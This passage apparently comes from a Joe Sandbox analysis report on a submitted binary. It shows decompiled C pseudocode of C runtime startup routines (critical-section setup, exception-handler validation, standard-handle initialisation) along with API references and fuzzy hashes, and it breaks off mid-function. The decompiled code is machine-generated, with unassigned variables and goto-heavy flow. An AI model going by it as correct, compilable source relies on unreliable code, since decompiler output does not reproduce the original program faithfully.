                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalFramesInitializeNestedSectionUnwind
                                                                    • String ID: 89B$csm$csm$csm
                                                                    • API String ID: 2222982843-295775647
                                                                    • Opcode ID: 4a6247d3efb09e660be9013e9ce08dd993c837138d6a87129f5f50171d983c3a
                                                                    • Instruction ID: b223c0e9202b9b58b7789bccb516841bed345c4c5a4c3ac399afd32fc213f5ba
                                                                    • Opcode Fuzzy Hash: 4a6247d3efb09e660be9013e9ce08dd993c837138d6a87129f5f50171d983c3a
                                                                    • Instruction Fuzzy Hash: CB719031A002299FCF11DF95E441A9E7BB5BF04316F9440ABE840AB252C77DDE51CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 62%
                                                                    			E00427A37(void* __eflags) {
                                                                    				_Unknown_base(*)()* _t9;
                                                                    				struct HINSTANCE__* _t12;
                                                                    				void* _t13;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				void* _t16;
                                                                    
                                                                    				_push(0x10);
                                                                    				_push(0x430ba8);
                                                                    				E0042422C(_t13, _t14, _t15);
                                                                    				_t9 =  *0x4483d4;
                                                                    				if(_t9 == 0) {
                                                                    					if( *0x448268 == 1) {
                                                                    						L4:
                                                                    						_t9 = 0x427a27;
                                                                    						 *0x4483d4 = 0x427a27;
                                                                    					} else {
                                                                    						_t12 = GetModuleHandleA("kernel32.dll");
                                                                    						if(_t12 == 0) {
                                                                    							goto L4;
                                                                    						} else {
                                                                    							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
                                                                    							 *0x4483d4 = _t9;
                                                                    							if(_t9 == 0) {
                                                                    								goto L4;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
                                                                    				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
                                                                    				return E00424267(_t10);
                                                                    			}









                                                                    0x00427a37
                                                                    0x00427a39
                                                                    0x00427a3e
                                                                    0x00427a43
                                                                    0x00427a4a
                                                                    0x00427a53
                                                                    0x00427a79
                                                                    0x00427a79
                                                                    0x00427a7e
                                                                    0x00427a55
                                                                    0x00427a5a
                                                                    0x00427a62
                                                                    0x00000000
                                                                    0x00427a64
                                                                    0x00427a6a
                                                                    0x00427a70
                                                                    0x00427a77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427a77
                                                                    0x00427a62
                                                                    0x00427a53
                                                                    0x00427a83
                                                                    0x00427a8f
                                                                    0x00427ab8
                                                                    0x00427ac1

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00430BA8,00000010,004240D3,00000000,00000FA0,74714DE0,00000000,00423D9C,00422D4F,?,004303A8,00000060), ref: 00427A5A
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00427A6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll$Mqt`7utIqt
                                                                    • API String ID: 1646373207-30289905
                                                                    • Opcode ID: fe75b7be8de6b1054739099a214b3014e88aeef33d0cba4dbe8fa8bd3602b57e
                                                                    • Instruction ID: 812ec9f115db8489c34653d962ab2dde815ca2b0a5fd48a61a1b64af0678f44a
                                                                    • Opcode Fuzzy Hash: fe75b7be8de6b1054739099a214b3014e88aeef33d0cba4dbe8fa8bd3602b57e
                                                                    • Instruction Fuzzy Hash: D8F09A34708212ABCB109FA5BC0575E3AB0AB48768FA0526EA900D12A0DBBC8B00DB1C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00427AC2(signed int _a4) {
                                                                    				intOrPtr _v8;
                                                                    				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                    				signed int _t51;
                                                                    				void* _t52;
                                                                    				signed int _t53;
                                                                    				signed int _t55;
                                                                    				signed int _t56;
                                                                    				signed int _t57;
                                                                    				signed int* _t60;
                                                                    				intOrPtr* _t61;
                                                                    				intOrPtr _t63;
                                                                    				signed int _t64;
                                                                    				signed int* _t66;
                                                                    				signed int _t67;
                                                                    				intOrPtr _t68;
                                                                    				void* _t69;
                                                                    				signed int _t70;
                                                                    				void* _t71;
                                                                    				intOrPtr _t73;
                                                                    				void _t74;
                                                                    				signed int _t75;
                                                                    				signed int _t76;
                                                                    				short* _t77;
                                                                    				void* _t79;
                                                                    				signed int _t80;
                                                                    				signed int _t81;
                                                                    				signed int _t82;
                                                                    				signed int _t83;
                                                                    				intOrPtr _t88;
                                                                    				signed int _t91;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    
                                                                    				_t92 = _a4;
                                                                    				_t69 =  *(_t92 + 8);
                                                                    				if((_t69 & 0x00000003) != 0) {
                                                                    					L3:
                                                                    					return 0;
                                                                    				}
                                                                    				_a4 =  *[fs:0x18];
                                                                    				_t51 = _a4;
                                                                    				_t73 =  *((intOrPtr*)(_t51 + 8));
                                                                    				_v8 = _t73;
                                                                    				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
                                                                    					_t88 =  *((intOrPtr*)(_t92 + 0xc));
                                                                    					__eflags = _t88 - 0xffffffff;
                                                                    					if(_t88 != 0xffffffff) {
                                                                    						_t81 = 0;
                                                                    						__eflags = 0;
                                                                    						_a4 = 0;
                                                                    						_t52 = _t69;
                                                                    						do {
                                                                    							_t74 =  *_t52;
                                                                    							__eflags = _t74 - 0xffffffff;
                                                                    							if(_t74 == 0xffffffff) {
                                                                    								goto L9;
                                                                    							}
                                                                    							__eflags = _t74 - _t81;
                                                                    							if(_t74 >= _t81) {
                                                                    								L41:
                                                                    								_t56 = 0;
                                                                    								L57:
                                                                    								return _t56;
                                                                    							}
                                                                    							L9:
                                                                    							__eflags =  *(_t52 + 4);
                                                                    							if( *(_t52 + 4) != 0) {
                                                                    								_t13 =  &_a4;
                                                                    								 *_t13 = _a4 + 1;
                                                                    								__eflags =  *_t13;
                                                                    							}
                                                                    							_t81 = _t81 + 1;
                                                                    							_t52 = _t52 + 0xc;
                                                                    							__eflags = _t81 - _t88;
                                                                    						} while (_t81 <= _t88);
                                                                    						__eflags = _a4;
                                                                    						if(_a4 == 0) {
                                                                    							L15:
                                                                    							_t53 =  *0x4483d8; // 0x0
                                                                    							_t91 = _t69 & 0xfffff000;
                                                                    							_t93 = 0;
                                                                    							__eflags = _t53;
                                                                    							if(_t53 <= 0) {
                                                                    								L18:
                                                                    								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
                                                                    								__eflags = _t55;
                                                                    								if(_t55 == 0) {
                                                                    									L56:
                                                                    									_t56 = _t55 | 0xffffffff;
                                                                    									__eflags = _t56;
                                                                    									goto L57;
                                                                    								}
                                                                    								__eflags = _v36.Type - 0x1000000;
                                                                    								if(_v36.Type != 0x1000000) {
                                                                    									goto L56;
                                                                    								}
                                                                    								__eflags = _v36.Protect & 0x000000cc;
                                                                    								if((_v36.Protect & 0x000000cc) == 0) {
                                                                    									L28:
                                                                    									_t57 = InterlockedExchange(0x448420, 1);
                                                                    									__eflags = _t57;
                                                                    									if(_t57 != 0) {
                                                                    										goto L5;
                                                                    									}
                                                                    									_t75 =  *0x4483d8; // 0x0
                                                                    									__eflags = _t75;
                                                                    									_t82 = _t75;
                                                                    									if(_t75 <= 0) {
                                                                    										L33:
                                                                    										__eflags = _t82;
                                                                    										if(_t82 != 0) {
                                                                    											L40:
                                                                    											InterlockedExchange(0x448420, 0);
                                                                    											goto L5;
                                                                    										}
                                                                    										_t70 = 0xf;
                                                                    										__eflags = _t75 - _t70;
                                                                    										if(_t75 <= _t70) {
                                                                    											_t70 = _t75;
                                                                    										}
                                                                    										_t83 = 0;
                                                                    										__eflags = _t70;
                                                                    										if(_t70 < 0) {
                                                                    											L38:
                                                                    											__eflags = _t75 - 0x10;
                                                                    											if(_t75 < 0x10) {
                                                                    												_t76 = _t75 + 1;
                                                                    												__eflags = _t76;
                                                                    												 *0x4483d8 = _t76;
                                                                    											}
                                                                    											goto L40;
                                                                    										} else {
                                                                    											do {
                                                                    												_t60 = 0x4483e0 + _t83 * 4;
                                                                    												_t83 = _t83 + 1;
                                                                    												__eflags = _t83 - _t70;
                                                                    												 *_t60 = _t91;
                                                                    												_t91 =  *_t60;
                                                                    											} while (_t83 <= _t70);
                                                                    											goto L38;
                                                                    										}
                                                                    									}
                                                                    									_t61 = 0x4483dc + _t75 * 4;
                                                                    									while(1) {
                                                                    										__eflags =  *_t61 - _t91;
                                                                    										if( *_t61 == _t91) {
                                                                    											goto L33;
                                                                    										}
                                                                    										_t82 = _t82 - 1;
                                                                    										_t61 = _t61 - 4;
                                                                    										__eflags = _t82;
                                                                    										if(_t82 > 0) {
                                                                    											continue;
                                                                    										}
                                                                    										goto L33;
                                                                    									}
                                                                    									goto L33;
                                                                    								}
                                                                    								_t77 = _v36.AllocationBase;
                                                                    								__eflags =  *_t77 - 0x5a4d;
                                                                    								if( *_t77 != 0x5a4d) {
                                                                    									goto L56;
                                                                    								}
                                                                    								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
                                                                    								__eflags =  *_t55 - 0x4550;
                                                                    								if( *_t55 != 0x4550) {
                                                                    									goto L56;
                                                                    								}
                                                                    								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
                                                                    								if( *((short*)(_t55 + 0x18)) != 0x10b) {
                                                                    									goto L56;
                                                                    								}
                                                                    								_t71 = _t69 - _t77;
                                                                    								__eflags =  *((short*)(_t55 + 6));
                                                                    								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
                                                                    								if( *((short*)(_t55 + 6)) <= 0) {
                                                                    									goto L56;
                                                                    								}
                                                                    								_t63 =  *((intOrPtr*)(_t79 + 0xc));
                                                                    								__eflags = _t71 - _t63;
                                                                    								if(_t71 < _t63) {
                                                                    									goto L28;
                                                                    								}
                                                                    								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
                                                                    								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
                                                                    									goto L28;
                                                                    								}
                                                                    								__eflags =  *(_t79 + 0x27) & 0x00000080;
                                                                    								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
                                                                    									goto L41;
                                                                    								}
                                                                    								goto L28;
                                                                    							} else {
                                                                    								goto L16;
                                                                    							}
                                                                    							while(1) {
                                                                    								L16:
                                                                    								__eflags =  *((intOrPtr*)(0x4483e0 + _t93 * 4)) - _t91;
                                                                    								if( *((intOrPtr*)(0x4483e0 + _t93 * 4)) == _t91) {
                                                                    									break;
                                                                    								}
                                                                    								_t93 = _t93 + 1;
                                                                    								__eflags = _t93 - _t53;
                                                                    								if(_t93 < _t53) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L18;
                                                                    							}
                                                                    							__eflags = _t93;
                                                                    							if(_t93 <= 0) {
                                                                    								goto L5;
                                                                    							}
                                                                    							_t64 = InterlockedExchange(0x448420, 1);
                                                                    							__eflags = _t64;
                                                                    							if(_t64 != 0) {
                                                                    								goto L5;
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(0x4483e0 + _t93 * 4)) - _t91;
                                                                    							if( *((intOrPtr*)(0x4483e0 + _t93 * 4)) == _t91) {
                                                                    								L53:
                                                                    								_t80 = 0;
                                                                    								__eflags = _t93;
                                                                    								if(_t93 < 0) {
                                                                    									L55:
                                                                    									InterlockedExchange(0x448420, 0);
                                                                    									goto L5;
                                                                    								} else {
                                                                    									goto L54;
                                                                    								}
                                                                    								do {
                                                                    									L54:
                                                                    									_t66 = 0x4483e0 + _t80 * 4;
                                                                    									_t80 = _t80 + 1;
                                                                    									__eflags = _t80 - _t93;
                                                                    									 *_t66 = _t91;
                                                                    									_t91 =  *_t66;
                                                                    								} while (_t80 <= _t93);
                                                                    								goto L55;
                                                                    							}
                                                                    							_t67 =  *0x4483d8; // 0x0
                                                                    							_t43 = _t67 - 1; // -1
                                                                    							_t93 = _t43;
                                                                    							__eflags = _t93;
                                                                    							if(_t93 < 0) {
                                                                    								L49:
                                                                    								__eflags = _t67 - 0x10;
                                                                    								if(_t67 < 0x10) {
                                                                    									_t67 = _t67 + 1;
                                                                    									__eflags = _t67;
                                                                    									 *0x4483d8 = _t67;
                                                                    								}
                                                                    								_t46 = _t67 - 1; // 0x0
                                                                    								_t93 = _t46;
                                                                    								goto L53;
                                                                    							} else {
                                                                    								goto L46;
                                                                    							}
                                                                    							while(1) {
                                                                    								L46:
                                                                    								__eflags =  *((intOrPtr*)(0x4483e0 + _t93 * 4)) - _t91;
                                                                    								if( *((intOrPtr*)(0x4483e0 + _t93 * 4)) == _t91) {
                                                                    									break;
                                                                    								}
                                                                    								_t93 = _t93 - 1;
                                                                    								__eflags = _t93;
                                                                    								if(_t93 >= 0) {
                                                                    									continue;
                                                                    								}
                                                                    								break;
                                                                    							}
                                                                    							__eflags = _t93;
                                                                    							if(__eflags >= 0) {
                                                                    								if(__eflags == 0) {
                                                                    									goto L55;
                                                                    								}
                                                                    								goto L53;
                                                                    							}
                                                                    							goto L49;
                                                                    						}
                                                                    						_t68 =  *((intOrPtr*)(_t92 - 8));
                                                                    						__eflags = _t68 - _v8;
                                                                    						if(_t68 < _v8) {
                                                                    							goto L41;
                                                                    						}
                                                                    						__eflags = _t68 - _t92;
                                                                    						if(_t68 >= _t92) {
                                                                    							goto L41;
                                                                    						}
                                                                    						goto L15;
                                                                    					}
                                                                    					L5:
                                                                    					_t56 = 1;
                                                                    					goto L57;
                                                                    				} else {
                                                                    					goto L3;
                                                                    				}
                                                                    			}



































                                                                    0x00427aca
                                                                    0x00427acd
                                                                    0x00427ad3
                                                                    0x00427af0
                                                                    0x00000000
                                                                    0x00427af0
                                                                    0x00427adb
                                                                    0x00427ade
                                                                    0x00427ae1
                                                                    0x00427ae6
                                                                    0x00427ae9
                                                                    0x00427af8
                                                                    0x00427afb
                                                                    0x00427afe
                                                                    0x00427b08
                                                                    0x00427b08
                                                                    0x00427b0a
                                                                    0x00427b0d
                                                                    0x00427b0f
                                                                    0x00427b0f
                                                                    0x00427b11
                                                                    0x00427b14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b16
                                                                    0x00427b18
                                                                    0x00427c63
                                                                    0x00427c63
                                                                    0x00427ce6
                                                                    0x00000000
                                                                    0x00427ce6
                                                                    0x00427b1e
                                                                    0x00427b1e
                                                                    0x00427b22
                                                                    0x00427b24
                                                                    0x00427b24
                                                                    0x00427b24
                                                                    0x00427b24
                                                                    0x00427b27
                                                                    0x00427b28
                                                                    0x00427b2b
                                                                    0x00427b2b
                                                                    0x00427b2f
                                                                    0x00427b33
                                                                    0x00427b49
                                                                    0x00427b49
                                                                    0x00427b50
                                                                    0x00427b56
                                                                    0x00427b58
                                                                    0x00427b5a
                                                                    0x00427b6e
                                                                    0x00427b75
                                                                    0x00427b7b
                                                                    0x00427b7d
                                                                    0x00427ce3
                                                                    0x00427ce3
                                                                    0x00427ce3
                                                                    0x00000000
                                                                    0x00427ce3
                                                                    0x00427b83
                                                                    0x00427b8a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b90
                                                                    0x00427b94
                                                                    0x00427bec
                                                                    0x00427bf3
                                                                    0x00427bf9
                                                                    0x00427bfb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c01
                                                                    0x00427c07
                                                                    0x00427c09
                                                                    0x00427c0b
                                                                    0x00427c20
                                                                    0x00427c20
                                                                    0x00427c22
                                                                    0x00427c51
                                                                    0x00427c58
                                                                    0x00000000
                                                                    0x00427c58
                                                                    0x00427c26
                                                                    0x00427c27
                                                                    0x00427c29
                                                                    0x00427c2b
                                                                    0x00427c2b
                                                                    0x00427c2d
                                                                    0x00427c2f
                                                                    0x00427c31
                                                                    0x00427c45
                                                                    0x00427c45
                                                                    0x00427c48
                                                                    0x00427c4a
                                                                    0x00427c4a
                                                                    0x00427c4b
                                                                    0x00427c4b
                                                                    0x00000000
                                                                    0x00427c33
                                                                    0x00427c33
                                                                    0x00427c33
                                                                    0x00427c3c
                                                                    0x00427c3d
                                                                    0x00427c3f
                                                                    0x00427c41
                                                                    0x00427c41
                                                                    0x00000000
                                                                    0x00427c33
                                                                    0x00427c31
                                                                    0x00427c0d
                                                                    0x00427c14
                                                                    0x00427c14
                                                                    0x00427c16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c18
                                                                    0x00427c19
                                                                    0x00427c1c
                                                                    0x00427c1e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c1e
                                                                    0x00000000
                                                                    0x00427c14
                                                                    0x00427b96
                                                                    0x00427b99
                                                                    0x00427b9e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ba7
                                                                    0x00427ba9
                                                                    0x00427baf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427bb5
                                                                    0x00427bbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427bc1
                                                                    0x00427bc3
                                                                    0x00427bcc
                                                                    0x00427bd0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427bd6
                                                                    0x00427bd9
                                                                    0x00427bdb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427be2
                                                                    0x00427be4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427be6
                                                                    0x00427bea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b5c
                                                                    0x00427b5c
                                                                    0x00427b5c
                                                                    0x00427b63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b69
                                                                    0x00427b6a
                                                                    0x00427b6c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b6c
                                                                    0x00427c67
                                                                    0x00427c69
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c7c
                                                                    0x00427c7e
                                                                    0x00427c80
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c86
                                                                    0x00427c8d
                                                                    0x00427cbd
                                                                    0x00427cbd
                                                                    0x00427cbf
                                                                    0x00427cc1
                                                                    0x00427cd5
                                                                    0x00427cdc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427cc3
                                                                    0x00427cc3
                                                                    0x00427cc3
                                                                    0x00427ccc
                                                                    0x00427ccd
                                                                    0x00427ccf
                                                                    0x00427cd1
                                                                    0x00427cd1
                                                                    0x00000000
                                                                    0x00427cc3
                                                                    0x00427c8f
                                                                    0x00427c94
                                                                    0x00427c94
                                                                    0x00427c97
                                                                    0x00427c99
                                                                    0x00427cab
                                                                    0x00427cab
                                                                    0x00427cae
                                                                    0x00427cb0
                                                                    0x00427cb0
                                                                    0x00427cb1
                                                                    0x00427cb1
                                                                    0x00427cb6
                                                                    0x00427cb6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427c9b
                                                                    0x00427c9b
                                                                    0x00427c9b
                                                                    0x00427ca2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ca4
                                                                    0x00427ca4
                                                                    0x00427ca5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ca5
                                                                    0x00427ca7
                                                                    0x00427ca9
                                                                    0x00427cbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427cbb
                                                                    0x00000000
                                                                    0x00427ca9
                                                                    0x00427b35
                                                                    0x00427b38
                                                                    0x00427b3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b41
                                                                    0x00427b43
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427b43
                                                                    0x00427b00
                                                                    0x00427b02
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004242B9,?), ref: 00427B75
                                                                    • InterlockedExchange.KERNEL32(00448420,00000001), ref: 00427BF3
                                                                    • InterlockedExchange.KERNEL32(00448420,00000000), ref: 00427C58
                                                                    • InterlockedExchange.KERNEL32(00448420,00000001), ref: 00427C7C
                                                                    • InterlockedExchange.KERNEL32(00448420,00000000), ref: 00427CDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlocked$QueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2947987494-0
                                                                    • Opcode ID: 2732343d804e41bff5c24e4326a6e69f578f08226c41092f09d17aa7e924ff49
                                                                    • Instruction ID: b2d51795aa5a4fea80f54206f756470e7129779bec07dd925f1cd34e768947a5
                                                                    • Opcode Fuzzy Hash: 2732343d804e41bff5c24e4326a6e69f578f08226c41092f09d17aa7e924ff49
                                                                    • Instruction Fuzzy Hash: 1351C230B086318BDB258F2AF8D472A77A1AB81758FA4812BD941C7391D779EC82C65C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E0042719C() {
                                                                    				void* __ebp;
                                                                    				signed int _t51;
                                                                    				signed int _t55;
                                                                    				long _t59;
                                                                    				signed int _t61;
                                                                    				signed int _t62;
                                                                    				signed int _t64;
                                                                    				signed int _t65;
                                                                    				void* _t69;
                                                                    				signed int* _t78;
                                                                    				signed int _t81;
                                                                    				signed int _t82;
                                                                    				signed int _t84;
                                                                    				signed int _t85;
                                                                    				signed int _t86;
                                                                    				signed char _t89;
                                                                    				signed int _t96;
                                                                    				void* _t99;
                                                                    				int _t101;
                                                                    				void** _t103;
                                                                    				void** _t105;
                                                                    				signed int** _t106;
                                                                    				intOrPtr* _t109;
                                                                    				void* _t110;
                                                                    
                                                                    				_t51 = E00422EEB(0x480);
                                                                    				if(_t51 != 0) {
                                                                    					 *0x44b140 = _t51;
                                                                    					 *0x44b120 = 0x20;
                                                                    					_t1 = _t51 + 0x480; // 0x480
                                                                    					_t84 = _t1;
                                                                    					while(1) {
                                                                    						__eflags = _t51 - _t84;
                                                                    						if(_t51 >= _t84) {
                                                                    							break;
                                                                    						}
                                                                    						 *_t51 =  *_t51 | 0xffffffff;
                                                                    						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
                                                                    						 *((char*)(_t51 + 4)) = 0;
                                                                    						 *((char*)(_t51 + 5)) = 0xa;
                                                                    						_t85 =  *0x44b140; // 0xb20640
                                                                    						_t51 = _t51 + 0x24;
                                                                    						_t84 = _t85 + 0x480;
                                                                    						__eflags = _t84;
                                                                    					}
                                                                    					GetStartupInfoA(_t110 + 0x14);
                                                                    					__eflags =  *((short*)(_t110 + 0x46));
                                                                    					if( *((short*)(_t110 + 0x46)) == 0) {
                                                                    						L26:
                                                                    						_t81 = 0;
                                                                    						__eflags = 0;
                                                                    						do {
                                                                    							_t86 =  *0x44b140; // 0xb20640
                                                                    							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
                                                                    							__eflags =  *_t103 - 0xffffffff;
                                                                    							if( *_t103 != 0xffffffff) {
                                                                    								_t49 =  &(_t103[1]);
                                                                    								 *_t49 = _t103[1] | 0x00000080;
                                                                    								__eflags =  *_t49;
                                                                    								goto L42;
                                                                    							}
                                                                    							__eflags = _t81;
                                                                    							_t103[1] = 0x81;
                                                                    							if(_t81 != 0) {
                                                                    								asm("sbb eax, eax");
                                                                    								_t59 =  ~(_t81 - 1) + 0xfffffff5;
                                                                    								__eflags = _t59;
                                                                    							} else {
                                                                    								_t59 = 0xfffffff6;
                                                                    							}
                                                                    							_t99 = GetStdHandle(_t59);
                                                                    							__eflags = _t99 - 0xffffffff;
                                                                    							if(_t99 == 0xffffffff) {
                                                                    								L40:
                                                                    								_t103[1] = _t103[1] | 0x00000040;
                                                                    							} else {
                                                                    								_t61 = GetFileType(_t99);
                                                                    								__eflags = _t61;
                                                                    								if(_t61 == 0) {
                                                                    									goto L40;
                                                                    								}
                                                                    								_t62 = _t61 & 0x000000ff;
                                                                    								__eflags = _t62 - 2;
                                                                    								 *_t103 = _t99;
                                                                    								if(__eflags != 0) {
                                                                    									__eflags = _t62 - 3;
                                                                    									if(__eflags == 0) {
                                                                    										_t42 =  &(_t103[1]);
                                                                    										 *_t42 = _t103[1] | 0x00000008;
                                                                    										__eflags =  *_t42;
                                                                    									}
                                                                    								} else {
                                                                    									_t103[1] = _t103[1] | 0x00000040;
                                                                    								}
                                                                    								_t44 =  &(_t103[3]); // 0xc
                                                                    								_push(0xfa0);
                                                                    								_t64 = E00427A37(__eflags);
                                                                    								__eflags = _t64;
                                                                    								if(_t64 == 0) {
                                                                    									L30:
                                                                    									_t55 = _t64 | 0xffffffff;
                                                                    									L44:
                                                                    									return _t55;
                                                                    								} else {
                                                                    									_t103[2] = _t103[2] + 1;
                                                                    									goto L42;
                                                                    								}
                                                                    							}
                                                                    							L42:
                                                                    							_t81 = _t81 + 1;
                                                                    							__eflags = _t81 - 3;
                                                                    						} while (_t81 < 3);
                                                                    						SetHandleCount( *0x44b120);
                                                                    						_t55 = 0;
                                                                    						__eflags = 0;
                                                                    						goto L44;
                                                                    					}
                                                                    					_t65 =  *(_t110 + 0x48);
                                                                    					__eflags = _t65;
                                                                    					if(_t65 == 0) {
                                                                    						goto L26;
                                                                    					}
                                                                    					_t101 =  *_t65;
                                                                    					_t109 = _t65 + 4;
                                                                    					 *(_t110 + 0x10) = _t101 + _t109;
                                                                    					__eflags = _t101 - 0x800;
                                                                    					if(_t101 >= 0x800) {
                                                                    						_t101 = 0x800;
                                                                    					}
                                                                    					__eflags =  *0x44b120 - _t101; // 0x20
                                                                    					if(__eflags >= 0) {
                                                                    						L18:
                                                                    						_t82 = 0;
                                                                    						__eflags = _t101;
                                                                    						if(_t101 <= 0) {
                                                                    							goto L26;
                                                                    						} else {
                                                                    							goto L19;
                                                                    						}
                                                                    						do {
                                                                    							L19:
                                                                    							_t69 =  *( *(_t110 + 0x10));
                                                                    							__eflags = _t69 - 0xffffffff;
                                                                    							if(_t69 == 0xffffffff) {
                                                                    								goto L25;
                                                                    							}
                                                                    							_t89 =  *_t109;
                                                                    							__eflags = _t89 & 0x00000001;
                                                                    							if((_t89 & 0x00000001) == 0) {
                                                                    								goto L25;
                                                                    							}
                                                                    							__eflags = _t89 & 0x00000008;
                                                                    							if(__eflags != 0) {
                                                                    								L23:
                                                                    								_t105 = 0x44b140[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
                                                                    								 *_t105 =  *( *(_t110 + 0x10));
                                                                    								_t105[1] =  *_t109;
                                                                    								_t30 =  &(_t105[3]); // 0xc
                                                                    								_push(0xfa0);
                                                                    								_t64 = E00427A37(__eflags);
                                                                    								__eflags = _t64;
                                                                    								if(_t64 == 0) {
                                                                    									goto L30;
                                                                    								}
                                                                    								_t31 =  &(_t105[2]);
                                                                    								 *_t31 = _t105[2] + 1;
                                                                    								__eflags =  *_t31;
                                                                    								goto L25;
